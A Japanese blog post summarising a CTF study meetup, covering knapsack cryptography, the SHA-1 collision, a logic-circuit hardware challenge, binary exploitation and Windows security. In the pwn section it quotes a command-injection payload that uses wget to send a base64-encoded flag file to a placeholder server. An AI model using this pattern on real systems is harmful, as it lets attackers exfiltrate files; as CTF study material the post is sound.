katagaitai CTF勉強会#7 #8 - 関東|med に参加してきました

2日間の開催!大容量
kanata約7年前に追加

脳が疲れたww
良い勉強会でございました。

katagaitai CTF勉強会 #7 - 関東|med : ATND
katagaitai CTF勉強会 #8 - 関東|med : ATND

trmrさんの部

ナップサック暗号!どういうものか解った!(解けるとは言っていない)

結論:MHナップサック暗号は、CTF的にいうと数パターンしかない。SageMathとか使って、LLLアルゴリズムでぶん殴れ!!!


あと、「(たぶん)日本で一番早いSHA-1衝突の勉強会」をしてくださいました。私が理解したポイントは・・・

  • マークス・ティーブンスはハッシュ衝突界のガチの人
  • 暗号屋さん的には予測の範囲内(前々回の勉強会でもtrmrさんが触れてた)
  • MD5から13年も破られてない。似たような構造の割にけっこう持ったという印象らしい。
  • GPU110個使って、1年間ぶん回して衝突させた(それでも、計算量は総当りよりは10万分の1で済んだ)
  • クラウドに換算すると11万ドル程かかる
  • Googleさんは、90日後に全てを明らかにすると言っている。さぁ、90日間のハッシュ衝突CTFの開催だ!

yskさんの部

2016年度のSECCON SECCON TOWERこと腕木通信の塔 しかり、ハードウェア系は「あ、こりゃダメだわ、完全に解けない領域に入ったわ」と思って、そっ閉じしてたんだけど、、

根気さえあれば解けるということが解った!!回路図を起こすのが、なんというか、すごいなコレ・・・
さすが、400点の価値はある。

神は最初にNANDを作り、それからORとかXORとかANDとかNOTとかいろいろ作った。

NANDの組み合わせで、全ての論理回路が実現できるという事を知ってれば、わりと解答に早く辿り着けるんだね。面白い問題だわ・・・

takさんの部

これ、とても良い資料でした。公開、期待しています!!
小さいバイナリながら、Pwnに必要な要素(bss領域のオーバーフローかーらーのー)が随所に仕込まれているので、これは大変勉強になる問題ですね!

ちょっと面白いバックコネクトの方法を紹介して頂きました。

CMD = ";wget http://999.999.999.999/\$(cat flag|base64);sleep 10;"

自前のWebサーバを持っていれば、404と共にフラグがアクセスログに記録される。CTFだとflagさえ読めればいいので、無理にシェルでバックコネクトしなくてもいいし、楽かも。

bataさんの部

怒涛の337ページ・・・っ!!5時間ほどぶっ続けで喋るbataさん・・・っ

PEとELFを比較して説明してくれていて、Windowsのセキュリティ機構を整理して説明していて、かつ、複雑なヒープの話を説明してかつ、exploitまで書いちゃおうという・・・すごい資料。すごい資料ヤバイ。

これだけで参考書一冊二冊の情報量を超えているので、脳が死にましたw

これはもー、あとからゆっくり拝読させて頂きます。だいぶWindowsとPEに詳しくなれたような気がしてきました。

Windowsのセキュリティ機構って、意外にしっかりしてました。今のWindowsなら、バッファオーバーフローの脆弱性をついてシェルを奪取するって、かなり難しいんじゃないかな。。少なくともLinuxよりも難しい気がします。


スライドの中にも各種ツールの紹介がありますが、昔、Windowsでマルウェアの挙動とかを調べるツールを教えて貰ったことがあるので、参考までにご紹介しておきます。

bataさんからも紹介してもらってましたが、特にAPI Monitorが、ものすごい便利そうです。

産学連携セミナー インシデントレスポンス概論 を受講してきました

頂き物

メモ帳もらったよ!!ありがたく使わせて頂きます。

20170225_katagaitaictf_1.jpg

余談

新ホワイトハッカ飴3000缶wwwww
待ってます。

20170225_katagaitaictf_1.jpg (55.492 KB) kanata, 2017/02/27 22:13


コメント

クリップボードから画像を追加 (サイズの上限: 100 MB)